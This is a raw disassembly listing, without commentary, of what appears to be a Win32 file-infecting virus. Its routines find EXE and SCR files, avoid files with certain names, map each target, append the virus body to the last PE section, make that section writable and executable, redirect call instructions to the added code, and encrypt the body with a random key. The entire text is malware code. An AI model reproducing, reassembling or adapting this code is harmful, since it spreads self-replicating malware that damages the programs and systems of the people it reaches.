mov al, 8Bh
stosd
jecxz short loc_31608E1A
mov ax, 0C031h
stosw
loc_31608E1A: ; CODE XREF: UPX2:31608E12�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31608E33
mov ax, 0C031h
stosw
loc_31608E33: ; CODE XREF: UPX2:31608E2B�j
mov al, 0C3h
stosb
loc_31608E36: ; CODE XREF: UPX2:31608DC1�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_31608E4E
push edi
sub edi, eax
pop eax
jmp short loc_31608E67
; ---------------------------------------------------------------------------
loc_31608E4E: ; CODE XREF: UPX2:31608E46�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31608E67: ; CODE XREF: UPX2:31608E4C�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_31608E87
neg eax
loc_31608E87: ; CODE XREF: UPX2:31608E83�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_31608E8B proc near ; CODE XREF: sub_316092B7+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_31609073
call near ptr loc_31608EAB+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31608EAB: ; CODE XREF: sub_31608E8B+F�p
add bh, bh
sub_31608E8B endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_316085C5
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_316085C5
mov edi, [ebp+4039A6h]
push esi
call sub_316085C5
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_31609073
jz loc_31609073
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_31609044
loc_31608F25: ; CODE XREF: sub_31609044+29�j
lodsb
cmp al, 0E8h
jnz loc_31608FD0
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_316085C5
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_31608F53
cmp eax, [edi+0Ch]
jnb loc_3160906C
jmp short loc_31608F5F
; ---------------------------------------------------------------------------
loc_31608F53: ; CODE XREF: sub_31609044-FE�j
cmp [ebp+4039A6h], edx
jnz loc_3160906C
loc_31608F5F: ; CODE XREF: sub_31609044-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_3160906C
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_316085C5
cmp [ebp+4039A6h], edi
jnz loc_3160906C
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3160906C
cmp eax, [edi+8]
jnb loc_3160906C
loc_31608FA8: ; CODE XREF: sub_31609044+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_31609082
jmp loc_3160906C
; ---------------------------------------------------------------------------
loc_31608FD0: ; CODE XREF: sub_31609044-11C�j
cmp al, 0FFh
jnz loc_3160906C
cmp byte ptr [esi], 15h
jnz loc_3160906C
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_316085C5
cmp [ebp+4039A6h], edi
jnz short loc_3160906C
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_31609019
cmp eax, [ebp+4039C6h]
jb short loc_31609082
loc_31609019: ; CODE XREF: sub_31609044-35�j
cmp eax, 70000000h
jb short loc_31609057
call sub_31609044
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_31609043
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3160905E
; ---------------------------------------------------------------------------
locret_31609043: ; CODE XREF: sub_31609044-F�j
retn
; END OF FUNCTION CHUNK FOR sub_31609044
; =============== S U B R O U T I N E =======================================
sub_31609044 proc near ; CODE XREF: sub_31609044-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 31608F25 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_316086CC
popa
loc_31609057: ; CODE XREF: sub_31609044-26�j
test eax, 80000000h
jnz short loc_3160906C
loc_3160905E: ; CODE XREF: sub_31609044-3�j
sub eax, [edi+0Ch]
jb short loc_3160906C
cmp eax, [edi+8]
jb loc_31608FA8
loc_3160906C: ; CODE XREF: sub_31609044-F9�j
; sub_31609044-EB�j ...
dec ecx
jnz loc_31608F25
loc_31609073: ; CODE XREF: sub_31608E8B+9�j
; UPX2:31608F0D�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_316090BE
; ---------------------------------------------------------------------------
loc_31609082: ; CODE XREF: sub_31609044-7F�j
; sub_31609044-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_316090BE: ; CODE XREF: sub_31609044+3C�j
pop edi
pop esi
retn
sub_31609044 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_316090C1 proc near ; CODE XREF: UPX2:3160928F�p
; sub_316092B7+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_31609192
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_31609192
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_3160964A
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3160963E
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3160963E
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3160963E
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_31609616
mov [ebp+403972h], eax
locret_31609192: ; CODE XREF: sub_316090C1+10�j
; sub_316090C1+27�j ...
retn
sub_316090C1 endp
; =============== S U B R O U T I N E =======================================
sub_31609193 proc near ; CODE XREF: sub_316092B7+117�p
; sub_316092B7+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_316091AD
add eax, [ebp+40106Dh]
loc_316091AD: ; CODE XREF: sub_31609193+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_31609193 endp
; =============== S U B R O U T I N E =======================================
sub_316091D8 proc near ; CODE XREF: sub_316092B7:loc_31609306�p
; sub_316092B7+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_316091DD: ; CODE XREF: sub_316091D8+23�j
jecxz short locret_31609214
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_31609214
cmp dword ptr [edx+0Ch], 1
jb short loc_316091DD
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_31609214: ; CODE XREF: sub_316091D8:loc_316091DD�j
; sub_316091D8+1D�j ...
retn
sub_316091D8 endp
; =============== S U B R O U T I N E =======================================
sub_31609215 proc near ; CODE XREF: UPX2:316092A1�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_31609215 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_31609222: ; CODE XREF: UPX2:31609243�j
mov ecx, edi
jmp short loc_31609231
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3160922D: ; CODE XREF: UPX2:3160923F�j
mov ebx, edi
xor ecx, ecx
loc_31609231: ; CODE XREF: UPX2:31609224�j
; UPX2:31609247�j
lodsb
cmp al, 61h
jb short loc_3160923C
cmp al, 7Ah
ja short loc_3160923C
sub al, 20h
loc_3160923C: ; CODE XREF: UPX2:31609234�j
; UPX2:31609238�j
stosb
cmp al, 5Ch
jz short loc_3160922D
cmp al, 2Eh
jz short loc_31609222
cmp al, 0
jnz short loc_31609231
jecxz short locret_31609214
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3160925F
cmp eax, 524353h
jnz locret_31609192
loc_3160925F: ; CODE XREF: UPX2:31609252�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_31609192
cmp eax, 4E554357h
jz locret_31609192
cmp eax, 32334357h
jz locret_31609192
cmp eax, 4F545350h
jz locret_31609192
xor ebx, ebx
call sub_316090C1
jz locret_31609192
xor edx, edx
call sub_316092B7
call sub_31609215
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_316095F4
; =============== S U B R O U T I N E =======================================
sub_316092B7 proc near ; CODE XREF: UPX2:3160929C�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_316095F4
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_316095F4
test dword ptr [ebx+16h], 2000h
jnz loc_316095F4
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_316095F4
jecxz short loc_31609306
cmp ecx, 101h
jbe loc_316095F4
loc_31609306: ; CODE XREF: sub_316092B7+41�j
call sub_316091D8
jb loc_316095F4
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_31607E10
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_31609330: ; CODE XREF: sub_316092B7+92�j
push 20h
dec cl
pop eax
js short loc_3160934B
call sub_31607E10
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_31609330
; ---------------------------------------------------------------------------
loc_3160934B: ; CODE XREF: sub_316092B7+7E�j
; sub_316092B7+CD�j ...
push 6
pop ecx
loc_31609351: ; CODE XREF: sub_316092B7+B8�j
push 6
pop eax
call sub_31607E10
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_31609351
test dword ptr [ebp+403431h], 8
jnz short loc_31609386
cmp byte ptr [ebp+40342Bh], 1
jz short loc_3160934B
loc_31609386: ; CODE XREF: sub_316092B7+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_316093AD
cmp byte ptr [ebp+403429h], 5
jz short loc_3160934B
cmp byte ptr [ebp+40342Ah], 5
jz short loc_3160934B
cmp byte ptr [ebp+40342Bh], 5
jz short loc_3160934B
loc_316093AD: ; CODE XREF: sub_316092B7+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_316093C2
cmp byte ptr [ebp+403429h], 2
ja short loc_3160934B
loc_316093C2: ; CODE XREF: sub_316092B7+100�j
and dword ptr [ebp+4039AEh], 0
call loc_3160885D
call sub_31609193
call sub_316095FD
mov ebx, [ebp+403976h]
call sub_316090C1
jz loc_316095F4
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_316091D8
jb loc_316095F4
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3160942A
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_3160942A: ; CODE XREF: sub_316092B7+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3160943E
rep movsb
loc_3160943E: ; CODE XREF: sub_316092B7+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_316094F6
push dword ptr [ebx+28h]
call sub_316085C5
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_316094F6
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3160947B
xor ecx, ecx
loc_3160947B: ; CODE XREF: sub_316092B7+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_316094E2
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_316094BB
neg dword ptr [eax]
loc_316094BB: ; CODE XREF: sub_316092B7+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_316094D9
neg dword ptr [eax]
loc_316094D9: ; CODE XREF: sub_316092B7+21E�j
push ecx
call sub_31609193
pop ecx
jmp short loc_316094EE
; ---------------------------------------------------------------------------
loc_316094E2: ; CODE XREF: sub_316092B7+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_316094EE: ; CODE XREF: sub_316092B7+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_316094F6: ; CODE XREF: sub_316092B7+191�j
; sub_316092B7+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3160950F
imul edx, 12345678h
loc_3160950F: ; CODE XREF: sub_316092B7+250�j
mov [eax-1], dl
call sub_316074E3
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_31609540
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_31609540: ; CODE XREF: sub_316092B7+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_31609565
push edx
call sub_31608E8B
pop edx
loc_31609565: ; CODE XREF: sub_316092B7+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_31609570
mov [ebx+28h], ecx
loc_31609570: ; CODE XREF: sub_316092B7+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_31609581
mov [edx+8], ecx
loc_31609581: ; CODE XREF: sub_316092B7+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_316095B2
add ecx, [ebp+40106Dh]
loc_316095B2: ; CODE XREF: sub_316092B7+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_316095D4
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_316095D4
mov dh, [ebp+403430h]
loc_316095D4: ; CODE XREF: sub_316092B7+307�j
; sub_316092B7+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_316095EB
loc_316095E0: ; CODE XREF: sub_316092B7+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_316095E0
jmp short loc_316095F4
; ---------------------------------------------------------------------------
loc_316095EB: ; CODE XREF: sub_316092B7+327�j
; sub_316092B7+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_316095EB
loc_316095F4: ; CODE XREF: UPX2:316092B2�j
; sub_316092B7+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_316092B7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_316095FD proc near ; CODE XREF: sub_316092B7+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_31609192
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_31609616: ; CODE XREF: sub_316090C1+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3160963E: ; CODE XREF: sub_316090C1+6B�j
; sub_316090C1+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_3160964A: ; CODE XREF: sub_316090C1+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_316095FD endp
; ---------------------------------------------------------------------------
db 0E8h, 2 dup(0)
dd 6A5D0000h, 49ED8101h, 58004033h, 85C10FF0h, 401580h
dd 83C3C085h, 0FF0FFC8h, 158085C1h, 3DC30040h, 2A0010h
dd 81661C75h, 6C0C247Ch, 60137571h, 0FFFFC4E8h, 0E80575FFh
dd 0FFFFFB7Eh, 0FFFFD2E8h, 0FF2E61FFh, 3456782Dh, 25B812h
dd 0E8600000h, 0FFFFFFA5h, 448B3975h, 0B58D3024h, 40384Eh
dd 6608508Bh, 2063A81h, 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h
dd 4035F8h, 8108C483h, 3F3F5C3Eh, 8303755Ch, 2BE804C6h
dd 0E8FFFFFBh, 0FFFFFF7Fh, 74B8C361h, 0EB000000h, 2FB8B1h
dd 10E80000h, 0C2000000h, 30B80020h, 0E8000000h, 3, 8D0024C2h
dd 0CD0C2454h, 0F8832Eh, 0E860197Ch, 0
; ---------------------------------------------------------------------------
mov edx, [esp+30h]
pop ebp
mov ebx, [edx]
sub ebp, 403413h
call sub_31607C7F
popa
retn 4
; ---------------------------------------------------------------------------
dw 706h
dd 2050103h, 27961631h, 15FF0E0Ah, 1001194h, 90h, 3Fh dup(0)
dd 0E7796300h, 0E737DE77h, 0F5157D77h, 0E7A5FD77h, 77h
dd 2 dup(0)
dd 0E7467200h, 0E7A83777h, 0E7779777h, 0E61BB877h, 0E7AA8377h
dd 0E7AC3777h, 0EBB1E777h, 0E73C4977h, 0E7942477h, 0E74CAB77h
dd 0E793EF77h, 0E73CE277h, 0E79F9377h, 0E6AF8F77h, 0E6AD3477h
dd 0E7C48677h, 0E7C65777h, 0E805D877h, 0E74D7677h, 0E7C81577h
dd 0E706B777h, 0EBA59577h, 0EBA6E977h, 0E7039677h, 0E7011A77h
dd 0E61BE677h, 0E77C4C77h, 0E7509077h, 0E7980A77h, 0E79D8C77h
dd 0F7E46377h, 0F7E60377h, 0F7E6A377h, 0F7E6B377h, 0F7E6D377h
dd 0F7EA7377h, 0F7EAF377h, 0F7EB6377h, 0F7EC4377h, 0F7F50377h
dd 0F5263377h, 77h, 14h dup(0)
dd 380036h, 31609978h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 69000000h, 0Ch dup(0)
dd 31000000h, 18CBh dup(0)
UPX2 ends
; Section 4. (virtual address 00010000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00010000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31610000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start